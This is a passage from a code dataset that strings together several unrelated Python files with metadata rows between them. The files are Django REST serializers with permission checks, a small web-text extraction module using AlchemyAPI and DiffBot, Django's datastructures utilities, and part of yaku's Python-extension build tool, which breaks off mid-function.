def update(self, instance, validated_data):
related_obj_name = self.Meta.related_obj_name
data = validated_data.pop(related_obj_name)
related_instance = getattr(instance, related_obj_name)
for attr_name, value in data.items():
if attr_name == 'password':
related_instance.set_password(value)
else:
setattr(related_instance, attr_name, value)
related_instance.save()
return super(EmployeeSerializer,self).update(instance, validated_data)
class SubdivisionChildField(serializers.RelatedField):
def to_representation(self, value):
return value.username
class SubdivisionSerializer(serializers.ModelSerializer):
link = serializers.HyperlinkedIdentityField(view_name='subdivision-detail')
manager_name = SubdivisionChildField(
source='manager', read_only=True, required=False
)
put_method_allowed = serializers.SerializerMethodField()
delete_method_allowed = serializers.SerializerMethodField()
def get_put_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.manager == user)
return staff or owner
def get_delete_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
return staff
class Meta:
model = Subdivision
fields = (
'id',
'link',
'title',
'description',
'manager',
'manager_name',
'put_method_allowed',
'delete_method_allowed'
)
class ProjectChildField(serializers.RelatedField):
def to_representation(self, value):
return value.username
class ProjectSerializer(serializers.ModelSerializer):
link = serializers.HyperlinkedIdentityField(view_name='project-detail')
owner = serializers.PrimaryKeyRelatedField(read_only=True, required=False)
owner_name = ProjectChildField(
source='owner', read_only=True, required=False
)
task_count = serializers.SerializerMethodField()
def get_task_count(self, obj):
return obj.task_set.count()
put_method_allowed = serializers.SerializerMethodField()
delete_method_allowed = serializers.SerializerMethodField()
def get_put_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.owner == user)
return staff or owner
def get_delete_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.owner == user)
return staff or owner
class Meta:
model = Project
fields = (
'id',
'link',
'title',
'description',
'created_date',
'owner',
'owner_name',
'task_count',
'put_method_allowed',
'delete_method_allowed'
)
class TaskParentSerializer(serializers.ModelSerializer):
link = serializers.HyperlinkedIdentityField(view_name='task-detail')
class Meta:
model = Task
fields =( 'id','title', 'link',)
class EmployeeChildField(serializers.RelatedField):
def to_representation(self, value):
return value.username
class TaskSerializer(serializers.ModelSerializer):
owner = serializers.PrimaryKeyRelatedField(read_only=True, required=False)
base_task = serializers.PrimaryKeyRelatedField(queryset=Task.objects.all(), required=False, allow_null=True)
project_name = serializers.CharField(
source='project', read_only=True, required=False
)
owner_name = EmployeeChildField(
source='owner', read_only=True,required=False
)
responsible_name = EmployeeChildField(
source='responsible', read_only=True,required=False
)
base_task_name = serializers.CharField(
source='base_task', read_only=True, required=False
)
status_type = serializers.SerializerMethodField()
put_method_allowed = serializers.SerializerMethodField()
delete_method_allowed = serializers.SerializerMethodField()
def get_put_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.owner == user)
responsible = authenticated and (obj.responsible == user)
return staff or owner or responsible
def get_delete_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.owner == user)
return staff or owner
def get_status_type(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.owner == user)
return staff or owner
class Meta:
model = Task
fields = (
'id',
'url',
'base_task',
'title',
'text',
'created_date',
'priority',
'status',
'project',
'owner',
'responsible',
'project_name',
'owner_name',
'responsible_name',
'base_task_name',
'put_method_allowed',
'delete_method_allowed',
'status_type'
)
class CommentSerializer(serializers.ModelSerializer):
employee = serializers.PrimaryKeyRelatedField(read_only=True, required=False)
employee_name = serializers.CharField(
source='employee', read_only=True, required=False
)
class Meta:
model = Comment
# class TaskPictureSerializer(serializers.ModelSerializer):
# class Meta:
# model = TaskPicture
# class CommentPictureSerializer(serializers.ModelSerializer):
# class Meta:
# model = CommentPicture | mit | 7,633,766,168,438,574,000 | 30.851064 | 113 | 0.627436 | false |
zniper/zeenote | simplenote/extract.py | 1 | 1830 | import requests
import logging
import json
from simplenote.settings import ALCHEMY_API_KEY, ALCHEMY_API_URL
from simplenote.settings import DIFFBOT_API_URL
logging.basicConfig()
logger = logging.getLogger(__name__)
class Extracter:
_url = ''
_text = ''
def __init__(self, url):
self._url = url
self.extractText()
def getText(self):
return self._text
def extractText(self):
pass
class AlchemyExtracter(Extracter):
def extractText(self):
""" Call API function from AlchemyAPI to extract text
"""
params = {}
params['url'] = self._url
params['apikey'] = ALCHEMY_API_KEY
params['outputMode'] = 'json'
print params
try:
r = requests.get(ALCHEMY_API_URL+'URLGetText', auth=('user', 'pass'))
print r.json
if r.json['status'] == 'OK':
self._text = r.json['text']
except:
logger.error('Error when calling AlchemyAPI')
raise
class DiffBotExtracter(Extracter):
def extractText(self):
""" Call API function from AlchemyAPI to extract text
"""
params = {}
try:
print self.url
r = requests.get(DIFFBOT_API_URL + source, params=params)
print r.status_code
if r.status_code == 200:
self._text = r.json['text']
except:
logger.error('Error when working with DiffBot')
raise
def ExtractText(source):
params = {}
try:
r = requests.get(DIFFBOT_API_URL + source, params=params)
data = r.json()
if r.status_code == 200:
return data['text']
except:
logger.error('Error when working with DiffBot')
raise
| mit | -6,868,258,579,506,773,000 | 24.416667 | 81 | 0.549727 | false |
yigitguler/django | django/utils/datastructures.py | 17 | 15984 | import copy
import warnings
from collections import OrderedDict
from django.utils import six
from django.utils.deprecation import RemovedInDjango19Warning
class MergeDict(object):
"""
A simple class for creating new "virtual" dictionaries that actually look
up values in more than one dictionary, passed in the constructor.
If a key appears in more than one of the given dictionaries, only the
first occurrence will be used.
"""
def __init__(self, *dicts):
warnings.warn('`MergeDict` is deprecated, use `dict.update()` '
'instead.', RemovedInDjango19Warning, 2)
self.dicts = dicts
def __bool__(self):
return any(self.dicts)
def __nonzero__(self):
return type(self).__bool__(self)
def __getitem__(self, key):
for dict_ in self.dicts:
try:
return dict_[key]
except KeyError:
pass
raise KeyError(key)
def __copy__(self):
return self.__class__(*self.dicts)
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
# This is used by MergeDicts of MultiValueDicts.
def getlist(self, key):
for dict_ in self.dicts:
if key in dict_:
return dict_.getlist(key)
return []
def _iteritems(self):
seen = set()
for dict_ in self.dicts:
for item in six.iteritems(dict_):
k = item[0]
if k in seen:
continue
seen.add(k)
yield item
def _iterkeys(self):
for k, v in self._iteritems():
yield k
def _itervalues(self):
for k, v in self._iteritems():
yield v
if six.PY3:
items = _iteritems
keys = _iterkeys
values = _itervalues
else:
iteritems = _iteritems
iterkeys = _iterkeys
itervalues = _itervalues
def items(self):
return list(self.iteritems())
def keys(self):
return list(self.iterkeys())
def values(self):
return list(self.itervalues())
def has_key(self, key):
for dict_ in self.dicts:
if key in dict_:
return True
return False
__contains__ = has_key
__iter__ = _iterkeys
def copy(self):
"""Returns a copy of this object."""
return self.__copy__()
def __str__(self):
'''
Returns something like
"{'key1': 'val1', 'key2': 'val2', 'key3': 'val3'}"
instead of the generic "<object meta-data>" inherited from object.
'''
return str(dict(self.items()))
def __repr__(self):
'''
Returns something like
MergeDict({'key1': 'val1', 'key2': 'val2'}, {'key3': 'val3'})
instead of generic "<object meta-data>" inherited from object.
'''
dictreprs = ', '.join(repr(d) for d in self.dicts)
return '%s(%s)' % (self.__class__.__name__, dictreprs)
class SortedDict(dict):
"""
A dictionary that keeps its keys in the order in which they're inserted.
"""
def __new__(cls, *args, **kwargs):
instance = super(SortedDict, cls).__new__(cls, *args, **kwargs)
instance.keyOrder = []
return instance
def __init__(self, data=None):
warnings.warn(
"SortedDict is deprecated and will be removed in Django 1.9.",
RemovedInDjango19Warning, stacklevel=2
)
if data is None or isinstance(data, dict):
data = data or []
super(SortedDict, self).__init__(data)
self.keyOrder = list(data) if data else []
else:
super(SortedDict, self).__init__()
super_set = super(SortedDict, self).__setitem__
for key, value in data:
# Take the ordering from first key
if key not in self:
self.keyOrder.append(key)
# But override with last value in data (dict() does this)
super_set(key, value)
def __deepcopy__(self, memo):
return self.__class__([(key, copy.deepcopy(value, memo))
for key, value in self.items()])
def __copy__(self):
# The Python's default copy implementation will alter the state
# of self. The reason for this seems complex but is likely related to
# subclassing dict.
return self.copy()
def __setitem__(self, key, value):
if key not in self:
self.keyOrder.append(key)
super(SortedDict, self).__setitem__(key, value)
def __delitem__(self, key):
super(SortedDict, self).__delitem__(key)
self.keyOrder.remove(key)
def __iter__(self):
return iter(self.keyOrder)
def __reversed__(self):
return reversed(self.keyOrder)
def pop(self, k, *args):
result = super(SortedDict, self).pop(k, *args)
try:
self.keyOrder.remove(k)
except ValueError:
# Key wasn't in the dictionary in the first place. No problem.
pass
return result
def popitem(self):
result = super(SortedDict, self).popitem()
self.keyOrder.remove(result[0])
return result
def _iteritems(self):
for key in self.keyOrder:
yield key, self[key]
def _iterkeys(self):
for key in self.keyOrder:
yield key
def _itervalues(self):
for key in self.keyOrder:
yield self[key]
if six.PY3:
items = _iteritems
keys = _iterkeys
values = _itervalues
else:
iteritems = _iteritems
iterkeys = _iterkeys
itervalues = _itervalues
def items(self):
return [(k, self[k]) for k in self.keyOrder]
def keys(self):
return self.keyOrder[:]
def values(self):
return [self[k] for k in self.keyOrder]
def update(self, dict_):
for k, v in six.iteritems(dict_):
self[k] = v
def setdefault(self, key, default):
if key not in self:
self.keyOrder.append(key)
return super(SortedDict, self).setdefault(key, default)
def copy(self):
"""Returns a copy of this object."""
# This way of initializing the copy means it works for subclasses, too.
return self.__class__(self)
def __repr__(self):
"""
Replaces the normal dict.__repr__ with a version that returns the keys
in their sorted order.
"""
return '{%s}' % ', '.join('%r: %r' % (k, v) for k, v in six.iteritems(self))
def clear(self):
super(SortedDict, self).clear()
self.keyOrder = []
class OrderedSet(object):
"""
A set which keeps the ordering of the inserted items.
Currently backs onto OrderedDict.
"""
def __init__(self, iterable=None):
self.dict = OrderedDict(((x, None) for x in iterable) if iterable else [])
def add(self, item):
self.dict[item] = None
def remove(self, item):
del self.dict[item]
def discard(self, item):
try:
self.remove(item)
except KeyError:
pass
def __iter__(self):
return iter(self.dict.keys())
def __contains__(self, item):
return item in self.dict
def __bool__(self):
return bool(self.dict)
def __nonzero__(self): # Python 2 compatibility
return type(self).__bool__(self)
class MultiValueDictKeyError(KeyError):
pass
class MultiValueDict(dict):
"""
A subclass of dictionary customized to handle multiple values for the
same key.
>>> d = MultiValueDict({'name': ['Adrian', 'Simon'], 'position': ['Developer']})
>>> d['name']
'Simon'
>>> d.getlist('name')
['Adrian', 'Simon']
>>> d.getlist('doesnotexist')
[]
>>> d.getlist('doesnotexist', ['Adrian', 'Simon'])
['Adrian', 'Simon']
>>> d.get('lastname', 'nonexistent')
'nonexistent'
>>> d.setlist('lastname', ['Holovaty', 'Willison'])
This class exists to solve the irritating problem raised by cgi.parse_qs,
which returns a list for every key, even though most Web forms submit
single name-value pairs.
"""
def __init__(self, key_to_list_mapping=()):
super(MultiValueDict, self).__init__(key_to_list_mapping)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__,
super(MultiValueDict, self).__repr__())
def __getitem__(self, key):
"""
Returns the last data value for this key, or [] if it's an empty list;
raises KeyError if not found.
"""
try:
list_ = super(MultiValueDict, self).__getitem__(key)
except KeyError:
raise MultiValueDictKeyError(repr(key))
try:
return list_[-1]
except IndexError:
return []
def __setitem__(self, key, value):
super(MultiValueDict, self).__setitem__(key, [value])
def __copy__(self):
return self.__class__([
(k, v[:])
for k, v in self.lists()
])
def __deepcopy__(self, memo=None):
if memo is None:
memo = {}
result = self.__class__()
memo[id(self)] = result
for key, value in dict.items(self):
dict.__setitem__(result, copy.deepcopy(key, memo),
copy.deepcopy(value, memo))
return result
def __getstate__(self):
obj_dict = self.__dict__.copy()
obj_dict['_data'] = dict((k, self.getlist(k)) for k in self)
return obj_dict
def __setstate__(self, obj_dict):
data = obj_dict.pop('_data', {})
for k, v in data.items():
self.setlist(k, v)
self.__dict__.update(obj_dict)
def get(self, key, default=None):
"""
Returns the last data value for the passed key. If key doesn't exist
or value is an empty list, then default is returned.
"""
try:
val = self[key]
except KeyError:
return default
if val == []:
return default
return val
def getlist(self, key, default=None):
"""
Returns the list of values for the passed key. If key doesn't exist,
then a default value is returned.
"""
try:
return super(MultiValueDict, self).__getitem__(key)
except KeyError:
if default is None:
return []
return default
def setlist(self, key, list_):
super(MultiValueDict, self).__setitem__(key, list_)
def setdefault(self, key, default=None):
if key not in self:
self[key] = default
# Do not return default here because __setitem__() may store
# another value -- QueryDict.__setitem__() does. Look it up.
return self[key]
def setlistdefault(self, key, default_list=None):
if key not in self:
if default_list is None:
default_list = []
self.setlist(key, default_list)
# Do not return default_list here because setlist() may store
# another value -- QueryDict.setlist() does. Look it up.
return self.getlist(key)
def appendlist(self, key, value):
"""Appends an item to the internal list associated with key."""
self.setlistdefault(key).append(value)
def _iteritems(self):
"""
Yields (key, value) pairs, where value is the last item in the list
associated with the key.
"""
for key in self:
yield key, self[key]
def _iterlists(self):
"""Yields (key, list) pairs."""
return six.iteritems(super(MultiValueDict, self))
def _itervalues(self):
"""Yield the last value on every key list."""
for key in self:
yield self[key]
if six.PY3:
items = _iteritems
lists = _iterlists
values = _itervalues
else:
iteritems = _iteritems
iterlists = _iterlists
itervalues = _itervalues
def items(self):
return list(self.iteritems())
def lists(self):
return list(self.iterlists())
def values(self):
return list(self.itervalues())
def copy(self):
"""Returns a shallow copy of this object."""
return copy.copy(self)
def update(self, *args, **kwargs):
"""
update() extends rather than replaces existing key lists.
Also accepts keyword args.
"""
if len(args) > 1:
raise TypeError("update expected at most 1 arguments, got %d" % len(args))
if args:
other_dict = args[0]
if isinstance(other_dict, MultiValueDict):
for key, value_list in other_dict.lists():
self.setlistdefault(key).extend(value_list)
else:
try:
for key, value in other_dict.items():
self.setlistdefault(key).append(value)
except TypeError:
raise ValueError("MultiValueDict.update() takes either a MultiValueDict or dictionary")
for key, value in six.iteritems(kwargs):
self.setlistdefault(key).append(value)
def dict(self):
"""
Returns current object as a dict with singular values.
"""
return dict((key, self[key]) for key in self)
class ImmutableList(tuple):
"""
A tuple-like object that raises useful errors when it is asked to mutate.
Example::
>>> a = ImmutableList(range(5), warning="You cannot mutate this.")
>>> a[3] = '4'
Traceback (most recent call last):
...
AttributeError: You cannot mutate this.
"""
def __new__(cls, *args, **kwargs):
if 'warning' in kwargs:
warning = kwargs['warning']
del kwargs['warning']
else:
warning = 'ImmutableList object is immutable.'
self = tuple.__new__(cls, *args, **kwargs)
self.warning = warning
return self
def complain(self, *wargs, **kwargs):
if isinstance(self.warning, Exception):
raise self.warning
else:
raise AttributeError(self.warning)
# All list mutation functions complain.
__delitem__ = complain
__delslice__ = complain
__iadd__ = complain
__imul__ = complain
__setitem__ = complain
__setslice__ = complain
append = complain
extend = complain
insert = complain
pop = complain
remove = complain
sort = complain
reverse = complain
class DictWrapper(dict):
"""
Wraps accesses to a dictionary so that certain values (those starting with
the specified prefix) are passed through a function before being returned.
The prefix is removed before looking up the real value.
Used by the SQL construction code to ensure that values are correctly
quoted before being used.
"""
def __init__(self, data, func, prefix):
super(DictWrapper, self).__init__(data)
self.func = func
self.prefix = prefix
def __getitem__(self, key):
"""
Retrieves the real value after stripping the prefix string (if
present). If the prefix is present, pass the value through self.func
before returning, otherwise return the raw value.
"""
if key.startswith(self.prefix):
use_func = True
key = key[len(self.prefix):]
else:
use_func = False
value = super(DictWrapper, self).__getitem__(key)
if use_func:
return self.func(value)
return value
| bsd-3-clause | -4,628,845,063,320,184,000 | 28.274725 | 107 | 0.551802 | false |
abadger/Bento | bento/private/_yaku/yaku/tools/pyext.py | 1 | 16532 | import sys
import os
import copy
import distutils
import distutils.sysconfig
import re
import warnings
from subprocess \
import \
Popen, PIPE, STDOUT
from yaku.task_manager \
import \
topo_sort, build_dag, \
CompiledTaskGen, set_extension_hook
from yaku.sysconfig \
import \
get_configuration, detect_distutils_cc
from yaku.compiled_fun \
import \
compile_fun
from yaku.task \
import \
task_factory
from yaku.utils \
import \
ensure_dir, get_exception
from yaku.environment \
import \
Environment
from yaku.conftests \
import \
check_compiler, check_header
from yaku.tools.ctasks \
import \
apply_define
from yaku.scheduler \
import \
run_tasks
from yaku.conf \
import \
with_conf_blddir, create_file, write_log
from yaku.errors \
import \
TaskRunFailure
from yaku._config \
import \
_OUTPUT
import yaku.tools
pylink, pylink_vars = compile_fun("pylink", "${PYEXT_SHLINK} ${PYEXT_LINK_TGT_F}${TGT[0].abspath()} ${PYEXT_LINK_SRC_F}${SRC} ${PYEXT_APP_LIBDIR} ${PYEXT_APP_LIBS} ${PYEXT_APP_FRAMEWORKS} ${PYEXT_SHLINKFLAGS}", False)
pycc, pycc_vars = compile_fun("pycc", "${PYEXT_CC} ${PYEXT_CFLAGS} ${PYEXT_INCPATH} ${PYEXT_CC_TGT_F}${TGT[0].abspath()} ${PYEXT_CC_SRC_F}${SRC}", False)
pycxx, pycxx_vars = compile_fun("pycxx", "${PYEXT_CXX} ${PYEXT_CXXFLAGS} ${PYEXT_INCPATH} ${PYEXT_CXX_TGT_F}${TGT[0].abspath()} ${PYEXT_CXX_SRC_F}${SRC}", False)
pycxxlink, pycxxlink_vars = compile_fun("pycxxlink", "${PYEXT_CXXSHLINK} ${PYEXT_LINK_TGT_F}${TGT[0].abspath()} ${PYEXT_LINK_SRC_F}${SRC} ${PYEXT_APP_LIBDIR} ${PYEXT_APP_LIBS} ${PYEXT_APP_FRAMEWORKS} ${PYEXT_SHLINKFLAGS}", False)
# pyext env <-> sysconfig env conversion
_SYS_TO_PYENV = {
"PYEXT_SHCC": "CC",
"PYEXT_CCSHARED": "CCSHARED",
"PYEXT_SHLINK": "LDSHARED",
"PYEXT_SUFFIX": "SO",
"PYEXT_CFLAGS": "CFLAGS",
"PYEXT_OPT": "OPT",
"PYEXT_LIBDIR": "LIBDIR",
}
_PYENV_REQUIRED = [
"LIBDIR_FMT",
"LIBS",
"LIB_FMT",
"CPPPATH_FMT",
"CC_TGT_F",
"CC_SRC_F",
"LINK_TGT_F",
"LINK_SRC_F",
]
_SYS_TO_CCENV = {
"CC": "CC",
"SHCC": "CCSHARED",
"SHLINK": "LDSHARED",
"SO": "SO",
"CFLAGS": "CFLAGS",
"OPT": "OPT",
"LIBDIR": "LIBDIR",
"LIBDIR_FMT": "LIBDIR_FMT",
"LIBS": "LIBS",
"LIB_FMT": "LIB_FMT",
"CPPPATH_FMT": "CPPPATH_FMT",
"CC_TGT_F": "CC_TGT_F",
"CC_SRC_F": "CC_SRC_F",
"CXX": "CXX",
"CXXSHLINK": "CXXSHLINK",
}
def setup_pyext_env(ctx, cc_type="default", use_distutils=True):
pyenv = Environment()
if use_distutils:
if cc_type == "default":
dist_env = get_configuration()
else:
dist_env = get_configuration(cc_type)
for name, value in dist_env.items():
pyenv["PYEXT_%s" % name] = value
pyenv["PYEXT_FMT"] = "%%s%s" % dist_env["SO"]
pyenv["PYEXT_SHLINKFLAGS"] = dist_env["LDFLAGS"]
else:
old_env = ctx.env
ctx.env = Environment()
cc_env = None
sys.path.insert(0, os.path.dirname(yaku.tools.__file__))
try:
try:
mod = __import__(cc_type)
mod.setup(ctx)
except ImportError:
raise RuntimeError("No tool %s is available (import failed)" \
% cc_type)
cc_env = ctx.env
finally:
sys.path.pop(0)
ctx.env = old_env
pyenv["PYEXT_CC"] = cc_env["CC"]
pyenv["PYEXT_CFLAGS"] = cc_env["CFLAGS"]
pyenv["PYEXT_LIBDIR"] = cc_env["LIBDIR"]
pyenv["PYEXT_LIBS"] = cc_env["LIBS"]
pyenv["PYEXT_FMT"] = "%s.so"
pyenv["PYEXT_SHLINK"] = cc_env["MODLINK"]
pyenv["PYEXT_SHLINKFLAGS"] = cc_env["MODLINKFLAGS"]
pyenv["PYEXT_CPPPATH"] = cc_env["CPPPATH"]
pyenv.append("PYEXT_CPPPATH", distutils.sysconfig.get_python_inc(), create=True)
if sys.platform == "win32":
pyenv.append("PYEXT_LIBDIR", os.path.join(sys.exec_prefix, "libs"))
return pyenv
def pycc_hook(self, node):
tasks = pycc_task(self, node)
self.object_tasks.extend(tasks)
return tasks
def pycc_task(self, node):
base = self.env["CC_OBJECT_FMT"] % node.name
target = node.parent.declare(base)
ensure_dir(target.abspath())
task = task_factory("pycc")(inputs=[node], outputs=[target])
task.gen = self
task.env_vars = pycc_vars
task.env = self.env
task.func = pycc
return [task]
def pycxx_hook(self, node):
tasks = pycxx_task(self, node)
self.object_tasks.extend(tasks)
self.has_cxx = True
return tasks
def pycxx_task(self, node):
base = self.env["CXX_OBJECT_FMT"] % node.name
target = node.parent.declare(base)
ensure_dir(target.abspath())
task = task_factory("pycxx")(inputs=[node], outputs=[target])
task.gen = self
task.env_vars = pycxx_vars
task.env = self.env
task.func = pycxx
return [task]
def pylink_task(self, name):
objects = [tsk.outputs[0] for tsk in self.object_tasks]
if len(objects) < 1:
warnings.warn("task %s has no inputs !" % name)
def declare_target():
folder, base = os.path.split(name)
tmp = folder + os.path.sep + self.env["PYEXT_FMT"] % base
return self.bld.path.declare(tmp)
target = declare_target()
ensure_dir(target.abspath())
task = task_factory("pylink")(inputs=objects, outputs=[target])
task.gen = self
task.func = pylink
task.env_vars = pylink_vars
self.link_task = task
return [task]
# XXX: fix merge env location+api
class PythonBuilder(yaku.tools.Builder):
def clone(self):
return PythonBuilder(self.ctx)
def __init__(self, ctx):
yaku.tools.Builder.__init__(self, ctx)
def _compile(self, task_gen, name):
apply_define(task_gen)
apply_cpppath(task_gen)
tasks = task_gen.process()
for t in tasks:
t.env = task_gen.env
return tasks
def try_compile(self, name, body, headers=None):
old_hook = set_extension_hook(".c", pycc_task)
try:
return with_conf_blddir(self.ctx, name, body,
lambda : yaku.tools.try_task_maker(self.ctx, self._compile, name, body, headers))
finally:
set_extension_hook(".c", old_hook)
def try_extension(self, name, body, headers=None):
old_hook = set_extension_hook(".c", pycc_task)
try:
return with_conf_blddir(self.ctx, name, body,
lambda : yaku.tools.try_task_maker(self.ctx, self._extension, name, body, headers))
finally:
set_extension_hook(".c", old_hook)
def _extension(self, task_gen, name):
bld = self.ctx
base = name.replace(".", os.sep)
tasks = []
old_hook = set_extension_hook(".c", pycc_hook)
old_hook_cxx = set_extension_hook(".cxx", pycxx_hook)
apply_define(task_gen)
apply_cpppath(task_gen)
apply_libpath(task_gen)
apply_libs(task_gen)
apply_frameworks(task_gen)
tasks = task_gen.process()
ltask = pylink_task(task_gen, base)
task_gen.link_task = ltask
if task_gen.has_cxx:
task_gen.link_task[-1].func = pycxxlink
task_gen.link_task[-1].env_vars = pycxxlink_vars
tasks.extend(ltask)
for t in tasks:
t.env = task_gen.env
set_extension_hook(".c", old_hook)
set_extension_hook(".cxx", old_hook_cxx)
return tasks
def extension(self, name, sources, env=None):
sources = self.to_nodes(sources)
task_gen = CompiledTaskGen("pyext", self.ctx, sources, name)
task_gen.bld = self.ctx
task_gen.env = yaku.tools._merge_env(self.env, env)
tasks = self._extension(task_gen, name)
self.ctx.tasks.extend(tasks)
outputs = []
for t in task_gen.link_task:
outputs.extend(t.outputs)
task_gen.outputs = outputs
return tasks
def try_extension(self, name, body, headers=None):
return with_conf_blddir(self.ctx, name, body,
lambda : yaku.tools.try_task_maker(self.ctx, self._extension, name, body, headers))
def configure(self, candidates=None, use_distutils=True):
ctx = self.ctx
# How we do it
# 1: for distutils-based configuration
# - get compile/flags flags from sysconfig
# - detect yaku tool name from CC used by distutils:
# - get the compiler executable used by distutils ($CC
# variable)
# - try to determine yaku tool name from $CC
# - apply necessary variables from yaku tool to $PYEXT_
# "namespace"
if candidates is None:
compiler_type = "default"
else:
compiler_type = candidates[0]
if use_distutils:
dist_env = setup_pyext_env(ctx, compiler_type)
ctx.env.update(dist_env)
cc_exec = get_distutils_cc_exec(ctx, compiler_type)
yaku_cc_type = detect_cc_type(ctx, cc_exec)
if yaku_cc_type is None:
raise ValueError("No adequate C compiler found (distutils mode)")
_setup_compiler(ctx, yaku_cc_type)
cxx_exec = get_distutils_cxx_exec(ctx, compiler_type)
yaku_cxx_type = detect_cxx_type(ctx, cxx_exec)
if yaku_cxx_type is None:
raise ValueError("No adequate CXX compiler found (distutils mode)")
_setup_cxxcompiler(ctx, yaku_cxx_type)
else:
dist_env = setup_pyext_env(ctx, compiler_type, False)
ctx.env.update(dist_env)
_setup_compiler(ctx, compiler_type)
pycode = r"""\
#include <Python.h>
#include <stdio.h>
static PyObject*
hello(PyObject *self, PyObject *args)
{
printf("Hello from C\n");
Py_INCREF(Py_None);
return Py_None;
}
static PyMethodDef HelloMethods[] = {
{"hello", hello, METH_VARARGS, "Print a hello world."},
{NULL, NULL, 0, NULL} /* Sentinel */
};
PyMODINIT_FUNC
init_bar(void)
{
(void) Py_InitModule("_bar", HelloMethods);
}
"""
ctx.start_message("Checking whether %s can build python object code" % compiler_type)
try:
self.try_compile("foo", pycode)
ctx.end_message("yes")
except TaskRunFailure:
e = get_exception()
ctx.end_message("no")
ctx.fail_configuration(str(e))
ctx.start_message("Checking whether %s can build python extension" % compiler_type)
try:
self.try_extension("foo", pycode)
ctx.end_message("yes")
except TaskRunFailure:
e = get_exception()
ctx.end_message("no")
ctx.fail_configuration(str(e))
self.configured = True
def get_builder(ctx):
return PythonBuilder(ctx)
CC_SIGNATURE = {
"gcc": re.compile("gcc version"),
"msvc": re.compile("Microsoft \(R\) (32-bit |)C/C\+\+ Optimizing Compiler")
}
def detect_cc_type(ctx, cc_cmd):
return _detect_cc_type(ctx, cc_cmd)
def detect_cxx_type(ctx, cxx_cmd):
cxx_type = _detect_cc_type(ctx, cxx_cmd)
if cxx_type == "gcc":
return "gxx"
else:
return cxx_type
def _detect_cc_type(ctx, cc_cmd):
cc_type = None
def detect_type(vflag):
cmd = cc_cmd + [vflag]
try:
p = Popen(cmd, stdout=PIPE, stderr=STDOUT)
out = p.communicate()[0].decode()
for k, v in CC_SIGNATURE.items():
m = v.search(out)
if m:
return k
except OSError:
pass
return None
_OUTPUT.write("Detecting CC type... ")
if sys.platform == "win32":
for v in ["", "-v"]:
cc_type = detect_type(v)
else:
for v in ["-v", "-V", "-###"]:
cc_type = detect_type(v)
if cc_type:
break
if cc_type is None:
cc_type = "cc"
_OUTPUT.write("%s\n" % cc_type)
return cc_type
def get_distutils_cc_exec(ctx, compiler_type="default"):
from distutils import ccompiler
_OUTPUT.write("Detecting distutils CC exec ... ")
if compiler_type == "default":
compiler_type = \
distutils.ccompiler.get_default_compiler()
compiler = ccompiler.new_compiler(compiler=compiler_type)
if compiler_type == "msvc":
compiler.initialize()
cc = [compiler.cc]
else:
cc = compiler.compiler_so
_OUTPUT.write("%s\n" % " ".join(cc))
return cc
def get_distutils_cxx_exec(ctx, compiler_type="default"):
from distutils import ccompiler
from distutils.sysconfig import customize_compiler
_OUTPUT.write("Detecting distutils CXX exec ... ")
if compiler_type == "default":
compiler_type = \
distutils.ccompiler.get_default_compiler()
compiler = ccompiler.new_compiler(compiler=compiler_type)
if compiler_type == "msvc":
compiler.initialize()
cc = [compiler.cc]
else:
customize_compiler(compiler)
cc = compiler.compiler_cxx
_OUTPUT.write("%s\n" % " ".join(cc))
return cc
def _setup_compiler(ctx, cc_type):
old_env = ctx.env
ctx.env = Environment()
cc_env = None
sys.path.insert(0, os.path.dirname(yaku.tools.__file__))
try:
try:
mod = __import__(cc_type)
mod.setup(ctx)
except ImportError:
raise RuntimeError("No tool %s is available (import failed)" \
% cc_type)
# XXX: this is ugly - find a way to have tool-specific env...
cc_env = ctx.env
finally:
sys.path.pop(0)
ctx.env = old_env
copied_values = ["CPPPATH_FMT", "LIBDIR_FMT", "LIB_FMT",
"CC_OBJECT_FMT", "CC_TGT_F", "CC_SRC_F", "LINK_TGT_F",
"LINK_SRC_F"]
for k in copied_values:
ctx.env["PYEXT_%s" % k] = cc_env[k]
ctx.env.prextend("PYEXT_CPPPATH", cc_env["CPPPATH"])
ctx.env.prextend("PYEXT_LIBDIR", cc_env["LIBDIR"])
def _setup_cxxcompiler(ctx, cxx_type):
old_env = ctx.env
ctx.env = Environment()
sys.path.insert(0, os.path.dirname(yaku.tools.__file__))
try:
mod = __import__(cxx_type)
mod.setup(ctx)
cxx_env = ctx.env
finally:
sys.path.pop(0)
ctx.env = old_env
for k in ["CXX", "CXXFLAGS", "CXX_TGT_F", "CXX_SRC_F",
"CXXSHLINK"]:
ctx.env["PYEXT_%s" % k] = cxx_env[k]
# FIXME: find a way to reuse this kind of code between tools
def apply_frameworks(task_gen):
# XXX: do this correctly (platform specific tool config)
if sys.platform == "darwin":
frameworks = task_gen.env.get("PYEXT_FRAMEWORKS", [])
task_gen.env["PYEXT_APP_FRAMEWORKS"] = []
for framework in frameworks:
task_gen.env["PYEXT_APP_FRAMEWORKS"].extend(["-framework", framework])
else:
task_gen.env["PYEXT_APP_FRAMEWORKS"] = []
def apply_libs(task_gen):
libs = task_gen.env["PYEXT_LIBS"]
task_gen.env["PYEXT_APP_LIBS"] = [
task_gen.env["PYEXT_LIB_FMT"] % lib for lib in libs]
def apply_libpath(task_gen):
libdir = task_gen.env["PYEXT_LIBDIR"]
#implicit_paths = set([
# os.path.join(task_gen.env["BLDDIR"], os.path.dirname(s))
# for s in task_gen.sources])
implicit_paths = []
libdir = list(implicit_paths) + libdir
task_gen.env["PYEXT_APP_LIBDIR"] = [
task_gen.env["PYEXT_LIBDIR_FMT"] % d for d in libdir]
def apply_cpppath(task_gen):
cpppaths = task_gen.env["PYEXT_CPPPATH"]
implicit_paths = set([s.parent.srcpath() \
for s in task_gen.sources])
srcnode = task_gen.sources[0].ctx.srcnode
